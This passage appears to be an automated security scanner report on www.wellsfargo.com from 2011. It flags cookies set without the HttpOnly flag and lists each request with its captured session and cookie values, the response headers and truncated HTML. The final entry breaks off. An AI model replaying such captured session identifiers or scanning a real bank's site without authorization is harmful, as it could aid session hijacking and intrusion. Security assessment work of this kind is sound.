<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/fraud/report/fraud HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:29 GMT Content-length: 5794 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sGGJNJhJvdHFzNC5MkDQXh52s09R1dnm7LNy8v1BGT8qQTbWpMvl!-213655893; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2448710410.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy_security/online/guarantee HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 7173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=ZWxLNJhLlFLsVdPS3Q2mcXf3Hh6RcqmGMcp1f68BhHGpyYSdLNJr!-180776916; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1811176202.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Privacy and Securi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/HE_selector HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:58 GMT Location: https://www.wellsfargo.com/customerApp/jsp/products_services/HE_selector.jsp Set-Cookie: wcmcookiewf=Z24pNJhG811khdlryT1wFK10GQBcQnR52yn1FwnyvQyZpkwyblxT!-1966973819; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2616482570.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/applications_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=pG7tNJhHLB1vQvYZNyr4dHYbT2y4l2WdqgQNVV7HxGrQqxWLchvv!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo - Apply for an Acc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/brokerage_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Location: https://www.wellsfargo.com/product/apply?prodCode=WFOR-WFOR&prodSet=APP2K&language=en Set-Cookie: wcmcookiewf=yW8lNJhH2y8PV61Vj0z4DvN2vJJwb2SCmNCn6YJG9hGG1PyGcg9H!1975738457; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2197052170.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/product ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/deposit_cklist HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:55 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fdeposit_cklist Set-Cookie: wcmcookiewf=R0LSNJhDJLQdQfLnqzJygyr0Tchx3G1YHp4RQW2wNh1xkR9TB3RL!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /products_services/pll_select HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:56 GMT Location: https://www.wellsfargo.com/customerApp/app2k/PreApplyRedirect.app?productserv_cd=%2FcustomerApp%2Fjsp%2Fproducts_services%2Fpll_select Set-Cookie: wcmcookiewf=ngV4NJhGD36GJv77QsGf18L1ZRq9tdksDFVdmDHvNN0R831F9g1h!-1957896322; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2482264842.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/custome ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rates/rates_viewall HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-length: 4031 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-length: 10180 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open a Savings Account or CD</ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings_cds/cds HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11464 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>CD Account - Find the Best CD ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:02 GMT Content-type: text/html; charset=utf-8 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-length: 11525 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Sitemap</title> <meta name=" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Content-length: 11102 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student/loans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:45 GMT Location: https://www.wellsfargo.com/student/apply Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/student ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /theprivatebank/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 10631 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/autoloans/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:12 GMT Content-length: 4590 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/insurance HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:13 GMT Content-length: 5083 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/wealthmanagement/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 4878 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wachovia to Wells Fargo Inter ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wf/product/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT X-Cnection: close Location: https://www.wellsfargo.com:443/customerApp/product/apply Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure Content-Language: en Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com:443/cus ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wfonline/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 10682 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wfonline/bill_pay/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
